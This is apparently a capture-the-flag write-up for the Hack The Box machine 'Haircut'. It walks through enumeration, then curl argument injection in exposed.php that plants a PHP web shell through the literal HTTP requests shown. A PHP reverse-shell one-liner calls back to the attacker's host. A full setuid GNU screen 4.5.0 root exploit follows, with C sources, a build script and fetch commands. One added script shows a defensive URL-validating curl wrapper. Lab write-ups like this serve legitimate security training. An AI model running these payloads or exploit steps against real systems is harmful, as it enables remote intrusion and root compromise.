Hack The Box Haircut
Sweets
- The OWASP DirBuster wordlists are excellent: the directory-list-1.0.txt shipped with ZAP found exposed.php where dirb, nikto and ZAP's own forced browse found nothing.
- It matters to work out which commands and what structure the web application uses under the hood (here, a form value handed straight to curl on the command line).
Procedure
portscan
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
```
web enum
- dirb: finds the uploads directory and test.html, but nothing useful in them
- nikto: same
- ZAP Forced Browse: same
dirsearch: a leftover file turns up
```
python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.24/ -e sh,php,html -w ~/.ZAP/fuzzers/dirbuster/directory-list-1.0.txt -f

[16:48:45] Starting:
[16:48:52] 200 -  446B - /exposed.php
[16:49:24] 200 -  144B - /index.html
[16:51:12] 200 -  141B - /hair.html
[16:52:24] 200 -  223B - /test.html
[16:54:44] 301 -  194B - /uploads  ->  http://10.10.10.24/uploads/
[16:54:44] 403 -  580B - /uploads/
```
exposed.php loads the content of whatever URL is submitted in the form, and it appears to do so by running the curl command to fetch the linked file. Submitting `sleep 10` as the form value shows this: the response embeds curl's progress meter and the error "Could not resolve host: sleep", so the form value is placed directly on curl's command line (the seconds that pass before the error are curl waiting on DNS for a host called "sleep", not a sleep command running). Because the input reaches curl as arguments, additional curl options can be injected.
```
POST /exposed.php HTTP/1.1
Host: 10.10.10.24
Content-Length: 28
Origin: http://10.10.10.24
Content-Type: application/x-www-form-urlencoded
Referer: http://10.10.10.24/exposed.php

formurl=sleep%2010&submit=Go
```

```
HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Wed, 05 May 2021 08:44:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 1578

<html>
<head>
<title>Hairdresser checker</title>
</head>
<body>
<form action='exposed.php' method='POST'>
<span>
<p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p>
</span>
<input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/>
<input type='submit' name='submit' value='Go' id='submit' />
</form>
<span>
<p>Requesting Site...</p>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:02 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:03 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:04 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:05 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:06 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:07 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:08 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:09 --:--:--     0curl: (6) Could not resolve host: sleep
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (7) Could not resolve host: sleep
</span>
</body>
</html>
```
Pointing the form at a PHP file hosted on the attack machine does not give direct code execution: curl just downloads the file and its source is echoed back into the page unexecuted.
```
POST /exposed.php HTTP/1.1
Host: 10.10.10.24
Content-Length: 64
Origin: http://10.10.10.24
Content-Type: application/x-www-form-urlencoded
Referer: http://10.10.10.24/exposed.php

formurl=http%3A%2F%2F10.10.14.2%3A12345%2FcmdShell.php&submit=Go
```

```
HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Wed, 05 May 2021 09:07:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 822

<html>
<head>
<title>Hairdresser checker</title>
</head>
<body>
<form action='exposed.php' method='POST'>
<span>
<p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p>
</span>
<input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/>
<input type='submit' name='submit' value='Go' id='submit' />
</form>
<span>
<p>Requesting Site...</p>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100    34  100    34    0     0     89      0 --:--:-- --:--:-- --:--:--    89
<?php system('ls'); exec('ls'); ?>
</span>
</body>
</html>
```
Since the form value is passed to curl as arguments, try writing the PHP file onto the server with curl's -o option.
```
POST /exposed.php HTTP/1.1
Host: 10.10.10.24
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.24/exposed.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

formurl=http%3A%2F%2F10.10.15.3%3A12345%2FcmdShell.php+-o+cmdShell.php&submit=Go
```

```
HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Sun, 09 May 2021 01:40:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 897

<html>
<head>
<title>Hairdresser checker</title>
</head>
<body>
<form action='exposed.php' method='POST'>
<span>
<p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p>
</span>
<input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/>
<input type='submit' name='submit' value='Go' id='submit' />
</form>
<span>
<p>Requesting Site...</p>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0Warning: Failed to create the file cmdShell.php: Permission denied
100   347  100   347    0     0   2124      0 --:--:-- --:--:-- --:--:--  2128
curl: (23) Failed writing body (0 != 347)
</span>
</body>
</html>
```
"Permission denied" and "Failed writing body" show that the injected -o was accepted (the 347 bytes were downloaded) but the web server user cannot write into the directory the script runs from. The uploads directory that dirsearch found (it exists, since listing it returns 403) may well be writable.
```
POST /exposed.php HTTP/1.1
Host: 10.10.10.24
Content-Length: 94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.24/exposed.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

formurl=http%3A%2F%2F10.10.15.3%3A12345%2FcmdShell.php+-o+.%2Fuploads%2FcmdShell.php&submit=Go
```

```
HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Sun, 09 May 2021 01:51:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 788

<html>
<head>
<title>Hairdresser checker</title>
</head>
<body>
<form action='exposed.php' method='POST'>
<span>
<p> Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html </p>
</span>
<input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/>
<input type='submit' name='submit' value='Go' id='submit' />
</form>
<span>
<p>Requesting Site...</p>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   347  100   347    0     0   1119      0 --:--:-- --:--:-- --:--:--  1122
</span>
</body>
</html>
```
!!web shell uploading Done!!
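As an added example (not code from the box or from this write-up; exposed.php's source is never shown, so the assumption is that it runs something like `sh -c "curl $formurl"` via shell_exec), the following POSIX shell reproduces the word-splitting that lets `-o ./uploads/cmdShell.php` reach curl as separate arguments, and contrasts it with a fetch wrapper that validates the URL and hands it to curl as one quoted argument after `--` with the allowed protocols pinned. The function names are mine and nothing in it touches the network.

```shell
#!/bin/sh
# Added example for this write-up, not code from the target or its author.
# Assumption: exposed.php builds a shell command like  curl $formurl  and
# runs it with the shell, so the value is word-split into curl arguments.

# Emulate what the shell does to an UNQUOTED $formurl: split it on whitespace
# into separate argv entries. Prints the resulting argument count, i.e. how
# many arguments curl would receive. "set -f" disables globbing so that only
# the splitting is shown.
argv_count_unquoted() {
    ( set -f; set -- $1; echo "$#" )
}

# Allow-list check for a user-supplied URL before it goes anywhere near curl.
# Returns 0 if acceptable, 1 otherwise.
#   - scheme must be http:// or https:// with a non-empty host; this also
#     rules out file://, dict://, gopher:// and a value starting with '-'
#   - no whitespace anywhere: a real URL never contains any, an injected
#     option such as "-o ./uploads/cmdShell.php" always does
is_safe_url() {
    case "$1" in
        http://[!/]*|https://[!/]*) ;;
        *) return 1 ;;
    esac
    case "$1" in
        *[[:space:]]*) return 1 ;;
    esac
    return 0
}

# Hardened fetch: validate first, then pass the URL as ONE quoted argument
# after '--' so curl cannot parse it as an option, and pin the protocols curl
# may use (also after a redirect, should -L ever be added) so that a
# file:// or similar SSRF target is refused by curl itself.
safe_fetch() {
    if ! is_safe_url "$1"; then
        printf 'rejected URL: %s\n' "$1" >&2
        return 1
    fi
    curl --silent --show-error --max-time 10 --max-redirs 0 \
         --proto '=http,https' --proto-redir '=http,https' -- "$1"
}

# DEMO=1 sh thisfile.sh  shows the injected payload from the write-up being
# split into three arguments and then rejected by safe_fetch.
if [ "${DEMO:-0}" = 1 ]; then
    payload='http://10.10.15.3:12345/cmdShell.php -o ./uploads/cmdShell.php'
    echo "argv entries curl would see: $(argv_count_unquoted "$payload")"
    safe_fetch "$payload" || echo "blocked before curl ran"
fi
```

The same idea applies to a PHP page: validate scheme and host (parse_url), and call curl through the curl extension with CURLOPT_PROTOCOLS, or at the very least wrap the value in escapeshellarg(), rather than concatenating user input into a shell_exec() string. Quoting alone is not enough, because a value that begins with `-` is still an option to curl; the scheme check is what removes that class of input.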
Start a listener on the attack machine:
```
$ nc -lnvp 4444
```
Then get a reverse shell by running the following through the web shell:
```
php -r '$sock=fsockopen("10.10.15.3",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
```
!!Get User Flag!!
local enum: a MySQL server is running, bound to localhost only
```
$ netstat -lnt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
```
linpeas
```
[SNIP]
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 1.6M May 19  2017 /usr/bin/screen-4.5.0
[SNIP]
```
The binary screen-4.5.0 has the SUID bit set and is owned by root. Searching for "screen 4.5.0" turns up exploit code on Exploit DB (EDB-ID 41154, the setuid GNU screen 4.5.0 local root via an attacker-controlled logfile written as root, CVE-2017-5618).
Run the exploit
```
$ chmod +x 41154.sh
$ sh ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
```
Running the script with sh does not get anywhere. It fails at this step, presumably because no compiler is available to www-data on the target:
```
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
```
So instead, build the library and the root shell on the attack machine, upload the binaries to /tmp on the target, and then run the remaining steps of the exploit script by hand:
```
$ cd /etc
$ umask 000
$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
$ screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

$ /tmp/rootshell
whoami
root
```
The setuid screen opens the logfile named by -L as root, so the echo's output lands in /etc/ld.so.preload. The truncated "cannot be preloaded ... ignored" line is the dynamic loader complaining about the first line of that logfile, which is not a library path, and skipping it; the `\x0a` in the echo exists so that /tmp/libhax.so starts on a line of its own. That entry is accepted, the library is loaded into the root-running `screen -ls`, and its constructor prints `[+] done!` after making /tmp/rootshell setuid root.
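The build that had to be moved to the attack machine, as an added example (not the page's own code and not 41154.sh itself): it writes and compiles the preload library and the setuid shell locally, so that only the two finished binaries need to be uploaded to /tmp on the target before the steps above. The C sources follow the logic of the public exploit (a constructor that chowns and chmods /tmp/rootshell and removes /etc/ld.so.preload); the original's malformed `execvp("/bin/sh", NULL, NULL)` is replaced with a correct execl. The build directory, the attacker address 10.10.15.3 and the port 12345 are assumptions reusing values from earlier in the write-up.

```shell
#!/bin/sh
# Added example, not code from the write-up or from the 41154.sh script.
# Builds the two pieces of the screen 4.5.0 ld.so.preload exploit on the
# attacking machine so that no compiler is needed on the target.

write_sources() {   # $1 = directory to write libhax.c and rootshell.c into
    mkdir -p "$1"
    cat > "$1/libhax.c" <<'EOF'
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Runs in every process that starts while /etc/ld.so.preload lists this
   library. The setuid-root "screen -ls" is such a process, so these calls
   run as root. Removing ld.so.preload afterwards stops later processes from
   loading the library again (and stops the "cannot be preloaded" noise). */
__attribute__((constructor))
static void dropshell(void)
{
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
    cat > "$1/rootshell.c" <<'EOF'
#include <unistd.h>

/* Once the constructor above has made this binary setuid root, running it
   drops into a root shell. */
int main(void)
{
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", (char *)0);
    return 1;   /* only reached if execl failed */
}
EOF
}

build_exploit() {   # $1 = directory holding the sources; produces libhax.so and rootshell
    # Build on a system with the same architecture as the target and a glibc
    # no newer than the target's (Ubuntu 16.04, going by the OpenSSH banner in
    # the port scan). A library the target's ld.so cannot load is silently
    # ignored and the chown never happens.
    gcc -fPIC -shared -o "$1/libhax.so" "$1/libhax.c" &&
    gcc -o "$1/rootshell" "$1/rootshell.c"
}

# Attacker side:
#   write_sources /tmp/screenroot && build_exploit /tmp/screenroot
#   cd /tmp/screenroot && python3 -m http.server 12345
# Target side (from the www-data shell), followed by the steps shown above:
#   curl -o /tmp/libhax.so http://10.10.15.3:12345/libhax.so
#   curl -o /tmp/rootshell http://10.10.15.3:12345/rootshell
#   cd /etc && umask 000
#   screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
#   screen -ls
#   /tmp/rootshell
```

umask 000 matters: ld.so.preload is created with the logfile's permissions, and the constructor's unlink only works because screen created the file world-writable in a directory root owns; check `ls -l /etc/ld.so.preload` before `screen -ls` if the trigger does nothing.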
Get Root Shell